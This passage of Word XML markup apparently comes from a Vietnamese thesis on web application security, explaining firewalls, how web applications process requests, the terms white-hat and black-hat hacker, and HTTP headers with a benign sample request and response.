          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="741"/>
          <w:tab w:val="left" w:pos="742"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="153" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kiểm soát địa chỉ truy nhập, cấm địa chỉ truy nhập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A26E78" w14:textId="4D8DF5BB" w:rsidR="008F4DA7" w:rsidRPr="00E42092" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="741"/>
          <w:tab w:val="left" w:pos="742"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="153" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Firewall hoạt động dựa trên gói IP do đó kiểm soát việc truy nhập của máy người sử</w:t>
      </w:r>
      <w:r w:rsidR="002A4E11" w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dụng</w:t>
      </w:r>
      <w:r w:rsidR="002A4E11" w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA2D4AD" w14:textId="795AA961"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 w:name="_Toc59634006"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hoạt động của ứng dụng web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="4535AAE2" w14:textId="5E70589F" w:rsidR="008F4DA7"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Đầu tiên trình duyệt sẽ gửi một yêu cầu (request) đến trình chủ Web thông qua các lệnh cơ bản GET, POST… của giao thức HTTP, trình chủ lúc này có thể cho thực thi một chương trình  được xây dựng từ nhiều ngôn ngữ như Perl, C/C++… hoặc trình  chủ yêu cầu bộ diễn dịch thực thi các trang ASP, JSP… theo yêu cầu của trình khách.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E21BC4" w14:textId="72D4A63D" w:rsidR="002A4E11" w:rsidRPr="00E42092"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Tùy theo các tác vụ của chương trình được cài đặt mà nó xử lý, tính toán, kết nối đến cơ sở dữ liệu, lưu các thông tin do trình khách gửi đến…và từ đó trả về cho trình  khách 1 luồng dữ liệu có định dạng theo giao thức HTTP, nó gồm 2 phần:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BBDDF6" w14:textId="30A69656" w:rsidR="008F4DA7" w:rsidRPr="008F4DA7" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Header mô tả các thông tin về gói dữ liệu và các thuộc tính, trạng thái trao đổi   giữa trình duyệt và WebServer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D518CF6" w14:textId="07D42B1E" w:rsidR="008F4DA7" w:rsidRPr="00E42092" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Body là phần nội dung dữ liệu mà Server gửi về Client, nó có thể là một file HTML, một hình ảnh, một đoạn phim hay một văn bản bất kì.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C7620A" w14:textId="18409CC7" w:rsidR="008F4DA7" w:rsidRPr="008F4DA7" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F4DA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Theo mô hình ở hình </w:t>
      </w:r>
      <w:r w:rsidR="002F0CA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="008F4DA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, với firewall, luồng thông tin giữa trình chủ và trình khách là luồng thông tin hợp lệ. Vì thế, nếu hacker tìm thấy vài lỗ hổng trong ứng dụng    Web thì firewall không còn hữu dụng trong việc ngăn chặn hacker này. Do đó, các kĩ thuật tấn công vào một hệ thống mạng ngày nay đang dần tập trung vào những sơ</w:t>
      </w:r>
      <w:r w:rsidR="002F0CA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008F4DA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>suất (hay lỗ hổng) trong quá trình tạo ứng dụng của những nhà phát triển Web hơn là tấn công trực tiếp vào hệ thống mạng, hệ điều hành. Tuy nhiên, hacker cũng có thể</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008F4DA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lợi dụng các lỗ hổng Web để mở rộng sự tấn công của mình vào các hệ thống không liên quan khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1E2C0B" w14:textId="56486B83"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3" w:name="_Toc59634007"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Khái niệm Hacker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="168DC4A5" w14:textId="2B0973FB"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 xml:space="preserve">Hacker là một thuật ngữ dùng để chuyên chỉ những kẻ phá hoại các hệ thống mạng… Hacker thường là những chuyên gia về máy tính. Hacker không tạo ra các kẽ hở cho  hệ thống, nhưng hacker lại là những người am hiểu về hệ điều hành, hệ quản trị dữ liệu, các ngôn ngữ lập trình…Họ sử dụng kiến thức của mình trong việc tìm tòi và  khai thác các lỗ hổng của hệ thống mạng. Một số hacker chỉ dừng lại  việc  phát hiện </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0CA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>và thông báo lỗi tìm được cho những nhà bảo mật hay người phát triển chương trình, họ được xem như là WhiteHat (Hacker nón trắng). Một số hacker dựa vào những lỗ hổng thực hiện việc khai thác trái phép nhằm mục đích phá hoại hay mưu lợi riêng, những người này bị xem như là BlackHat (Hacker nón đen).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33516ECF" w14:textId="2CBB5394" w:rsidR="002F0CA8" w:rsidRDefault="002F0CA8" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>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Vì tính chất phổ biến của thuật ngữ hacker, nên trong phần trình bày, luận văn sẽ sử dụng “hacker” thay cho “kẻ tấn công”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2210A31B" w14:textId="0B31DE66"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4" w:name="_Toc59634008"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Khái niệm HTTP Header</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="132DAB26" w14:textId="48AECFC5"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HTTP header là phần đầu (header) của thông tin mà trình khách và trình chủ gửi cho nhau. Những thông tin trình khách gửi cho trình chủ được gọi là HTTP requests (yêu</w:t>
      </w:r>
      <w:r w:rsidR="0096149B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0096149B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cầu) còn trình chủ gửi cho trình khách là HTTP responses (trả lời). Thông thường,   một HTTP header gồm nhiều dòng, mỗi dòng chứa tên tham số và giá trị. Một số tham số có thể được dùng trong cả header yêu cầu và header trả lời, còn số khác thì  chỉ đuợc dùng riêng trong từng loại. Ví dụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3A0984"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Pr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251657216" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="603BFD70" wp14:editId="23A37257">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>801014</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>267335</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5476240" cy="2103120"/>
                <wp:effectExtent l="0" t="0" r="10160" b="1143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2103120"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E6E6E6"/>
                        </a:solidFill>
                        <a:ln w="6096">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="76EA67C2" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                            <w:pPr>
                              <w:spacing w:before="29" w:line="369" w:lineRule="auto"/>
                              <w:ind w:left="106" w:right="4497"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                              <w:t>GET /tintuc/homnay.asp HTTP/1.1 Accept: */*</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="199B71EB" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                            <w:pPr>
                              <w:spacing w:line="369" w:lineRule="auto"/>
                              <w:ind w:left="106" w:right="5660"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                              <w:t>Accept-Language: en-us Connection: Keep-Alive Host: localhost</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7B6E0255" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                            <w:pPr>
                              <w:spacing w:line="237" w:lineRule="exact"/>
                              <w:ind w:left="106"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Referer: </w:t>
                            </w:r>
                            <w:hyperlink r:id="rId14">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Courier New"/>
                                  <w:sz w:val="21"/>
                                </w:rPr>
                                <w:t>http://localhost/lienket.asp</w:t>
                              </w:r>
                            </w:hyperlink>
                          </w:p>
                          <w:p w14:paraId="465C7F66" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                            <w:pPr>
                              <w:spacing w:before="128" w:line="369" w:lineRule="auto"/>
                              <w:ind w:left="106" w:right="489"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                              <w:t>User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Accept-Encoding: gzip, def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BFD70" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 5" o:spid="_x0000_s1094" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.05pt;margin-top:21.05pt;width:431.2pt;height:165.6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" fillcolor="#e6e6e6" strokeweight=".48pt">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="76EA67C2" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:spacing w:before="29" w:line="369" w:lineRule="auto"/>
                        <w:ind w:left="106" w:right="4497"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>GET /tintuc/homnay.asp HTTP/1.1 Accept: */*</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="199B71EB" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:spacing w:line="369" w:lineRule="auto"/>
                        <w:ind w:left="106" w:right="5660"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>Accept-Language: en-us Connection: Keep-Alive Host: localhost</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7B6E0255" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:spacing w:line="237" w:lineRule="exact"/>
                        <w:ind w:left="106"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Referer: </w:t>
                      </w:r>
                      <w:hyperlink r:id="rId15">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Courier New"/>
                            <w:sz w:val="21"/>
                          </w:rPr>
                          <w:t>http://localhost/lienket.asp</w:t>
                        </w:r>
                      </w:hyperlink>
                    </w:p>
                    <w:p w14:paraId="465C7F66" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                      <w:pPr>
                        <w:spacing w:before="128" w:line="369" w:lineRule="auto"/>
                        <w:ind w:left="106" w:right="489"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Accept-Encoding: gzip, deflate</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="002F0CA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Header yêu cầu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D670CE6" w14:textId="77777777" w:rsidR="0096149B" w:rsidRDefault="002F0CA8" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>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Dòng đầu là dòng yêu cầu cho biết phương thức yêu cầu (GET  hoặc POST), địa chỉ yêu cầu (/tintuc/homnay.asp) và phiên bản HTTP (HTTP/1.1)..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F05A813" w14:textId="77777777" w:rsidR="0096149B" w:rsidRDefault="002F0CA8" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>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Tiếp theo là các tham số. Chẳng hạn như:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6CA93B" w14:textId="77777777" w:rsidR="0096149B" w:rsidRDefault="002F0CA8" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>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Accept-Language: Cho biết ngôn ngữ dùng trong trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE09EBB" w14:textId="19E701A3" w:rsidR="0096149B" w:rsidRDefault="002F0CA8" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>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Host: Cho biết địa chỉ của máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA44AA4" w14:textId="5D33DDA6" w:rsidR="0096149B" w:rsidRDefault="002F0CA8" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>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Referer: Cho biết địa chỉ của trang web tham chiếu tới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEC4FFD" w14:textId="77777777" w:rsidR="0096149B" w:rsidRDefault="0096149B" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:num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0" distR="0" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78769185" wp14:editId="395CF2BD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>808330</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>283210</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5476240" cy="3427260"/>
                <wp:effectExtent l="0" t="0" r="10160" b="2095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240" cy="342726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FFC8F9B" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                            <w:pPr>
                              <w:spacing w:before="29"/>
                              <w:ind w:left="106"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                              <w:t>HTTP/1.1 200 OK</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="771E2976" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                            <w:pPr>
                              <w:spacing w:before="130"/>
                              <w:ind w:left="106"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                              <w:t>Server: Microsoft-IIS/5.0</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5B29933E" w14:textId="27F6C5AA" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                            <w:pPr>
                              <w:spacing w:before="128"/>
                              <w:ind w:left="106"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                              <w:t>Date: Thu, 13 Jul 2000 05:46:53 GMT</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4109D04B" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                            <w:pPr>
                              <w:spacing w:before="128"/>
                              <w:ind w:left="106"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="395C60B5" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                            <w:pPr>
                              <w:spacing w:before="128"/>
                              <w:ind w:left="106"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="3D32F385" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">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66B51BF7" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">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LKLDFFKCINFLDMFHCBCBMFLJ;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4CFECD17" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                            <w:pPr>
                              <w:spacing w:before="127"/>
                              <w:ind w:left="106"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                              <w:t>path=/</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="660EB695" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                            <w:pPr>
                              <w:spacing w:before="130"/>
                              <w:ind w:left="106"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                              <w:t>Cache-control: private</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5D7F5A0E" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="79AEA273" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:spacing w:before="8"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="19"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="3B9B0E0A" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                            <w:pPr>
                              <w:ind w:left="106"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                              <w:t>&lt;HTML&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="46765DA4" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                            <w:pPr>
                              <w:spacing w:before="127"/>
                              <w:ind w:left="106"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                              <w:t>&lt;BODY&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="45F32569" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                            <w:pPr>
                              <w:spacing w:before="130"/>
                              <w:ind w:left="106"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                              <w:t>...</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="046F4EE9" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="002F0CA8">
                            <w:pPr>
